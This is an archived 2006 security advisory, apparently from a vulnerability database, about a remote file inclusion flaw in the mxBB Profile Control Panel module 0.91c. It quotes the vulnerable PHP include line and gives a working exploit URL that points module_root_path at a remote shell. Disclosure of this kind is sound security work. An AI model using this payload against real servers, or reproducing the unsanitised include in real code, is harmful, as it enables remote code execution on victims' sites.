mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

2006-12-10T00:00:00
ID SECURITYVULNS:DOC:15361
Type securityvulns
Reporter Securityvulns
Modified 2006-12-10T00:00:00

Description

mxBB Module Profile Control Panel 0.91c Remote File Include Vulnerability

Bugfound3R: bd0rk || SOH-Crew

Website: www.soh-crew.it.tt

Greetz: str0ke, Lu7k, TheJT, Natok

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=70

==> Vulnerable Code in profilcp_constants.php <==

Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx);

Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL?